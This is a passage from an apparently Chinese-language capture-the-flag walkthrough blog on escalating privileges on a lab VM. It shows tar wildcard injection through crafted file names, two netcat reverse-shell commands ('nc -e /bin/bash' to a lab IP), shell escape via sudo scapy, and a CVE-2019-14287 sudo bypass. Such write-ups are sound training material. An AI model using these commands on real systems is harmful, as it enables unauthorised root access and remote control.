bored...\n<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4e0a\u4f20<code>pspy64<\/code>.<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329096.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329096.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614161938117\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u4e86\u82e5\u5e72\u811a\u672c\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) carl@choc:\/tmp$ cd \/home\/torki\/\n(remote) carl@choc:\/home\/torki$ ls -la\ntotal 44\ndrwxr-xr-x 6 torki torki 4096 Apr 19  2021 .\ndrwxr-xr-x 5 root  root  4096 Apr 18  2021 ..\n-rwx------ 1 torki torki   71 Apr 18  2021 backup.sh\nlrwxrwxrwx 1 root  root     9 Apr 18  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 torki torki  220 Apr 12  2021 .bash_logout\n-rw-r--r-- 1 torki torki 3526 Apr 12  2021 .bashrc\ndrwx------ 3 torki torki 4096 Apr 12  2021 .gnupg\ndrwxr-xr-x 3 torki torki 4096 Apr 18  2021 .local\n-rw-r--r-- 1 torki torki  807 Apr 12  2021 .profile\ndrwxrwxrwx 2 torki torki 4096 Apr 20  2021 secret_garden\n-rw-r--r-- 1 torki torki   66 Apr 18  2021 .selected_editor\ndrwx------ 2 torki torki 4096 Apr 12  2021 .ssh<\/code><\/pre>\n<h3>tar\u4e0d\u5b89\u5168\u884c\u4e3a\u63d0\u6743<\/h3>\n<p>\u770b\u540d\u5b57\u50cf\u662f\u5907\u4efd\u811a\u672c\uff0c\u67e5\u770b\u4e00\u4e0b\u5907\u4efd\u6587\u4ef6\u5728\u54ea\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) carl@choc:\/home\/torki$ find \/ -user torki 2&gt;\/dev\/null            \n\/home\/torki\n\/home\/torki\/.profile\n\/home\/torki\/.selected_editor\n\/home\/torki\/secret_garden\n\/home\/torki\/secret_garden\/diary.txt\n\/home\/torki\/.bash_logout\n\/home\/torki\/.bashrc\n\/home\/torki\/.gnupg\n\/home\/torki\/.local\n\/home\/torki\/.local\/share\n\/home\/torki\/.ssh\n\/home\/torki\/backup.sh\n\/tmp\/backup_home.tgz<\/code><\/pre>\n<p>\u770b\u770b\u54b1\u4eec\u8fd9\u4e2a\u7528\u6237\u662f\u4e0d\u662f\u6709\u5565\u7279\u6b8a\u53ef\u5199\u76ee\u5f55\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) carl@choc:\/tmp$ find \/ -type d -writable 2&gt;\/dev\/null\n\/sys\/fs\/cgroup\/systemd\/user.slice\/user-1002.slice\/user@1002.service\n\/sys\/fs\/cgroup\/systemd\/user.slice\/user-1002.slice\/user@1002.service\/init.scope\n\/sys\/fs\/cgroup\/unified\/user.slice\/user-1002.slice\/user@1002.service\n\/sys\/fs\/cgroup\/unified\/user.slice\/user-1002.slice\/user@1002.service\/init.scope\n\/home\/torki\/secret_garden\n\/home\/carl\n\/home\/carl\/.gnupg\n\/home\/carl\/.gnupg\/private-keys-v1.d\n\/home\/carl\/.local\n\/home\/carl\/.local\/share\n\/home\/carl\/.local\/share\/nano\n\/home\/carl\/.ssh\n\/var\/tmp\n\/tmp\n\/tmp\/.font-unix\n\/tmp\/.ICE-unix\n\/tmp\/.X11-unix\n\/tmp\/.Test-unix\n\/tmp\/.XIM-unix\n\/proc\/1589\/task\/1589\/fd\n\/proc\/1589\/fd\n\/proc\/1589\/map_files\n\/run\/user\/1002\n\/run\/user\/1002\/gnupg\n\/run\/user\/1002\/systemd\n\/run\/lock\n\/dev\/mqueue\n\/dev\/shm<\/code><\/pre>\n<p>\u54b1\u4eec\u5c45\u7136\u5728\u8fd9\u4e2a\u5907\u4efd\u76ee\u5f55\u91cc\u6709\u53ef\u5199\u6743\u9650\uff0c\u662f\u4e0d\u662f\u610f\u5473\u7740\u63a5\u4e0b\u6765\u7684\u6f0f\u6d1e\u5229\u7528\u662f\u56f4\u7ed5\u7740\u8fd9\u4e2a\u538b\u7f29\u5907\u4efd\u64cd\u4f5c\u8fdb\u884c\u7684\u3002\u3002\u3002\u3002<\/p>\n<p>\u968f\u4fbf\u5199\u4e00\u4e2a\u6587\u4ef6\u8fdb\u53bb\uff0c\u770b\u770b\u6709\u5565\u53d8\u5316\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) carl@choc:\/home\/torki\/secret_garden$ ls -la \/tmp\/backup_home.tgz \n-rw-r--r-- 1 torki torki 10240 Jun 14 10:31 \/tmp\/backup_home.tgz\n(remote) carl@choc:\/home\/torki\/secret_garden$ echo &#039;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&#039; &gt; temp\n(remote) carl@choc:\/home\/torki\/secret_garden$ ls -la \/tmp\/backup_home.tgz                  \n-rw-r--r-- 1 torki torki 10240 Jun 14 10:32 \/tmp\/backup_home.tgz\n(remote) carl@choc:\/home\/torki\/secret_garden$ ls -la \/tmp\/backup_home.tgz \n-rw-r--r-- 1 torki torki 10240 Jun 14 11:10 \/tmp\/backup_home.tgz<\/code><\/pre>\n<p>\u8bf4\u660e\u4e0d\u662f\u538b\u7f29\u6574\u4e2a\u76ee\u5f55\u7684\uff0c\u53ea\u662f\u4e2a\u522b\u6587\u4ef6\uff0c<\/p>\n<blockquote>\n<p>\u53c2\u8003\uff1a<\/p>\n<ul>\n<li><a href=\"https:\/\/gtfobins.github.io\/gtfobins\/tar\/\">https:\/\/gtfobins.github.io\/gtfobins\/tar\/<\/a><\/li>\n<li><a href=\"https:\/\/book.hacktricks.wiki\/en\/linux-hardening\/privilege-escalation\/wildcards-spare-tricks.html?highlight=tar#tar\">https:\/\/book.hacktricks.wiki\/en\/linux-hardening\/privilege-escalation\/wildcards-spare-tricks.html?highlight=tar#tar<\/a><\/li>\n<\/ul>\n<\/blockquote>\n<p>\u5c1d\u8bd5\u901a\u8fc7<code>tar<\/code>\u7684\u4e0d\u5b89\u5168\u914d\u7f6e\u6267\u884c\u76f8\u5173\u547d\u4ee4\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">(remote) carl@choc:\/home\/torki\/secret_garden$ touch -- &quot;--checkpoint=1&quot;\n(remote) carl@choc:\/home\/torki\/secret_garden$ touch -- &quot;--checkpoint-action=exec=sh shell.sh&quot;\n(remote) carl@choc:\/home\/torki\/secret_garden$ echo &quot;nc -e \/bin\/bash 192.168.10.102 2345&quot; &gt; shell.sh\n(remote) carl@choc:\/home\/torki\/secret_garden$ chmod +x shell.sh<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329097.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329097.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614171906332\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>python\u53cd\u5f39shell<\/h3>\n<pre><code class=\"language-bash\">(remote) torki@choc:\/home\/torki\/secret_garden$ ls -la\ntotal 20\ndrwxrwxrwx 2 torki torki 4096 Jun 14 11:18  .\ndrwxr-xr-x 6 torki torki 4096 Apr 19  2021  ..\n-rw-r--r-- 1 carl  carl     0 Jun 14 11:18 &#039;--checkpoint=1&#039;\n-rw-r--r-- 1 carl  carl     0 Jun 14 11:18 &#039;--checkpoint-action=exec=sh shell.sh&#039;\n-rw-r--r-- 1 torki torki  325 Apr 20  2021  diary.txt\n-rwxr-xr-x 1 carl  carl    36 Jun 14 11:18  shell.sh\n-rw-r--r-- 1 carl  carl    32 Jun 14 10:31  temp\n(remote) torki@choc:\/home\/torki\/secret_garden$ cd ..\/\n(remote) torki@choc:\/home\/torki$ ls -la\ntotal 44\ndrwxr-xr-x 6 torki torki 4096 Apr 19  2021 .\ndrwxr-xr-x 5 root  root  4096 Apr 18  2021 ..\n-rwx------ 1 torki torki   71 Apr 18  2021 backup.sh\nlrwxrwxrwx 1 root  root     9 Apr 18  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 torki torki  220 Apr 12  2021 .bash_logout\n-rw-r--r-- 1 torki torki 3526 Apr 12  2021 .bashrc\ndrwx------ 3 torki torki 4096 Apr 12  2021 .gnupg\ndrwxr-xr-x 3 torki torki 4096 Apr 18  2021 .local\n-rw-r--r-- 1 torki torki  807 Apr 12  2021 .profile\ndrwxrwxrwx 2 torki torki 4096 Jun 14 11:18 secret_garden\n-rw-r--r-- 1 torki torki   66 Apr 18  2021 .selected_editor\ndrwx------ 2 torki torki 4096 Apr 12  2021 .ssh\n(remote) torki@choc:\/home\/torki$ cat bashup.sh \ncat: bashup.sh: No such file or directory\n(remote) torki@choc:\/home\/torki$ cat backup.sh \n#!\/bin\/bash\ncd \/home\/torki\/secret_garden\ntar cf \/tmp\/backup_home.tgz *\n(remote) torki@choc:\/tmp$ sudo -l\nUser torki may run the following commands on choc:\n    (sarah) NOPASSWD: \/usr\/bin\/scapy\n(remote) torki@choc:\/tmp$ \/usr\/bin\/scapy\nWARNING: Cannot read wireshark manuf database\nINFO: Can&#039;t import matplotlib. Won&#039;t be able to plot.\nINFO: Can&#039;t import PyX. Won&#039;t be able to use psdump() or pdfdump().\nWARNING: Failed to execute tcpdump. Check it is installed and in the PATH\nINFO: Can&#039;t import python-cryptography v1.7+. Disabled WEP decryption\/encryption. (Dot11)\nINFO: Can&#039;t import python-cryptography v1.7+. Disabled IPsec encryption\/authentication.\nWARNING: IPython not available. Using standard Python shell instead.\nAutoCompletion, History are disabled.\n\n                     aSPY\/\/YASa       \n             apyyyyCY\/\/\/\/\/\/\/\/\/\/YCa       |\n            sY\/\/\/\/\/\/YSpcs  scpCY\/\/Pp     | Welcome to Scapy\n ayp ayyyyyyySCP\/\/Pp           syY\/\/C    | Version 2.4.0\n AYAsAYYYYYYYY\/\/\/Ps              cY\/\/S   |\n         pCCCCY\/\/p          cSSps y\/\/Y   | https:\/\/github.com\/secdev\/scapy\n         SPPPP\/\/\/a          pP\/\/\/AC\/\/Y   |\n              A\/\/A            cyP\/\/\/\/C   | Have fun!\n              p\/\/\/Ac            sC\/\/\/a   |\n              P\/\/\/\/YCpc           A\/\/A   | Craft packets like I craft my beer.\n       scccccp\/\/\/pSP\/\/\/p          p\/\/Y   |               -- Jean De Clerck\n      sY\/\/\/\/\/\/\/\/\/y  caa           S\/\/P   |\n       cayCyayP\/\/Ya              pY\/Ya\n        sY\/PsY\/\/\/\/YCc          aC\/\/Yp \n         sc  sccaCY\/\/PCypaapyCP\/\/YSs  \n                  spCPY\/\/\/\/\/\/YPSps    \n                       ccaacs         \n\n>&gt;&gt; <\/code><\/pre>\n<p>\u7136\u540e\u4e00\u6d4b\u8bd5\u53d1\u73b0\u5c31\u662f python \u73af\u5883\uff1a<\/p>\n<pre><code class=\"language-bash\">>&gt;&gt; print(1)\n1\n>&gt;&gt; <\/code><\/pre>\n<p>\u5c1d\u8bd5\u53cd\u5f39shell\u5373\u53ef\u3002\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">>&gt;&gt; import os;\n>&gt;&gt; os.system(&quot;nc -e \/bin\/bash 192.168.10.102 3456&quot;)<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329098.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329098.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614172854941\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329099.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329099.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614172919152\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u63d0\u6743root<\/h3>\n<pre><code class=\"language-bash\">(remote) sarah@choc:\/home\/sarah$ ls -la\ntotal 48\ndrwxrwx--- 5 sarah torki 4096 Apr 20  2021 .\ndrwxr-xr-x 5 root  root  4096 Apr 18  2021 ..\nlrwxrwxrwx 1 root  root     9 Apr 18  2021 .bash_history -&gt; \/dev\/null\n-rwxrwxr-- 1 sarah sarah  220 Apr 12  2021 .bash_logout\n-rwxrwxr-- 1 sarah sarah 3557 Apr 20  2021 .bashrc\ndrwx------ 3 sarah sarah 4096 Apr 19  2021 .gnupg\ndrwxrwx--- 3 sarah sarah 4096 Apr 19  2021 .local\n-rwx------ 1 sarah sarah   13 Apr 20  2021 .note.txt\n-rwxrwxr-- 1 sarah sarah  808 Apr 19  2021 .profile\n-rw-r--r-- 1 sarah sarah  444 Apr 19  2021 quotes.txt\n-rw-r--r-- 1 sarah sarah   66 Apr 19  2021 .selected_editor\ndrwx------ 2 sarah sarah 4096 Apr 20  2021 .ssh\n-rwx------ 1 sarah sarah   13 Apr 18  2021 user.txt\n(remote) sarah@choc:\/home\/sarah$ cat user.txt \ncommenquaded\n(remote) sarah@choc:\/home\/sarah$ sudo -l\nUser sarah may run the following commands on choc:\n    (ALL, !root) NOPASSWD: \/usr\/bin\/wall<\/code><\/pre>\n<p>wall \u662f\u4e00\u4e2a\u4f20\u9012\u4fe1\u606f\u7684\u5de5\u5177\uff0c\u5c06\u4fe1\u606f\u4f20\u9012\u7ed9\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) sarah@choc:\/home\/sarah$ cat .note.txt \nfuckmeplease\n(remote) sarah@choc:\/home\/sarah$ cat quotes.txt \n\n \u201cYou must have chaos within you to give birth to a dancing star.\u201d \n\n \u201cIt is not a lack of love, but a lack of friendship that makes unhappy marriages.\u201d \n\n \u201cThe multiplication of our kind borders on the obscene; the duty to love them, on the preposterous.\u201d \n\n\u201cWe do not die because we have to die; we die because one day, and not so long ago, our consciousness was forced to deem it necessary.\u201c\n\n\u201cLuke, I am your father&quot;\n\n(remote) sarah@choc:\/home\/sarah$ cd .local\n(remote) sarah@choc:\/home\/sarah\/.local$ ls -la\ntotal 3024\ndrwxrwx--- 3 sarah sarah    4096 Apr 19  2021 .\ndrwxrwx--- 5 sarah torki    4096 Apr 20  2021 ..\n-rwxr-xr-x 1 sarah sarah 3078592 Mar 14  2021 pspy64\n-rwxrwxrwx 1 sarah sarah      42 Apr 19  2021 script.sh\ndrwxrwx--- 3 sarah sarah    4096 Apr 12  2021 share\n(remote) sarah@choc:\/home\/sarah\/.local$ cat script.sh \n#!\/bin\/bash\n\ncat \/home\/sarah\/quotes.txt \n(remote) sarah@choc:\/home\/sarah\/.local$ whereis sudo\nsudo: \/usr\/local\/bin\/sudo\n(remote) sarah@choc:\/home\/sarah\/.local$ \/usr\/local\/bin\/sudo -V\nSudo version 1.8.23\nSudoers policy plugin version 1.8.23\nSudoers file grammar version 46\nSudoers I\/O plugin version 1.8.23<\/code><\/pre>\n<p>\u6ce8\u610f\u5230\u524d\u9762\u4e00\u76f4\u53d1\u73b0\u7684<code>sudo<\/code>\u5947\u602a\u4f4d\u7f6e\u5e76\u6ca1\u6709\u8d77\u5230\u4f5c\u7528\uff0c\u8fd9\u91cc\u5229\u7528\u70b9\u662fCVE-2019-14287\uff1a<\/p>\n<p><strong>sudo \u7248\u672c\u4f4e\u4e8e 1.8.28<\/strong>\uff08\u6f0f\u6d1e\u4fee\u590d\u7248\u672c\uff09\u3002<\/p>\n<table>\n<thead>\n<tr>\n<th style=\"text-align: center;\"><strong>UID \u503c<\/strong><\/th>\n<th style=\"text-align: center;\"><strong>\u9884\u671f\u8eab\u4efd<\/strong><\/th>\n<th style=\"text-align: center;\"><strong>\u5b9e\u9645\u8eab\u4efd<\/strong><\/th>\n<th style=\"text-align: center;\"><strong>\u7ed3\u679c<\/strong><\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td style=\"text-align: center;\"><code>-u#1000<\/code><\/td>\n<td style=\"text-align: center;\">\u666e\u901a\u7528\u6237<\/td>\n<td style=\"text-align: center;\">\u7528\u6237 1000<\/td>\n<td style=\"text-align: center;\">\u6b63\u5e38\u6267\u884c<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\"><code>-u#0<\/code><\/td>\n<td style=\"text-align: center;\">root<\/td>\n<td style=\"text-align: center;\">root<\/td>\n<td style=\"text-align: center;\">\u88ab\u914d\u7f6e\u663e\u5f0f\u62d2\u7edd<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\"><code>-u#-1<\/code> \u6216 <code>4294967295<\/code><\/td>\n<td style=\"text-align: center;\">\u672a\u77e5<\/td>\n<td style=\"text-align: center;\"><strong>root<\/strong><\/td>\n<td style=\"text-align: center;\"><strong>\u7ed5\u8fc7\u9650\u5236\uff0c\u63d0\u6743\u6210\u529f<\/strong><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<pre><code class=\"language-bash\">(remote) sarah@choc:\/tmp$ mesg\nis y<\/code><\/pre>\n<p>\u8fd8\u9700\u8981\u4e00\u4e2a\u7ec8\u7aef\uff0c\u767b\u5f55<code>carl<\/code>\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) carl@choc:\/home\/carl$ mesg\nis y<\/code><\/pre>\n<p>\u7136\u540e\u5c1d\u8bd5\u8fdb\u884c\u5e7f\u64ad\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329100.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329100.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614175726232\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u4f46\u662f\u6211\u8fd9\u91cc\u4e00\u76f4\u90fd\u662f\u5931\u8d25\u7684\uff0c\u4e0d\u77e5\u9053\u4e3a\u5565\u3002\u3002\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329101.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329101.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614211154662\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329102.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329102.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614211204503\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u5e76\u4e14\u6211\u7684kali\u4e5f\u8fd0\u884c\u4e0d\u4e86wall\uff01\uff01\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329103.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329103.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"9e78552092f5dd5242595d0d7224b0ec\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329104.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329104.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"img\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u7136\u540e\u6211\u6c42\u52a9\u4e86\u4e00\u4e0b\u7fa4\u4e3b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329105.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329105.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614212116172\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u4e8e\u662f\u6211\u6362\u4e86\u4e00\u53f0kali\uff0c\u4e4b\u524d\u641e\u73af\u5883\u5feb\u62a5\u5e9f\u7684kali\uff0c\u53ef\u4ee5\u6b63\u5e38\u8fd0\u884c\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329106.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329106.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614212018887\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u4f46\u662f\u663e\u793a\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329107.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329107.png\" 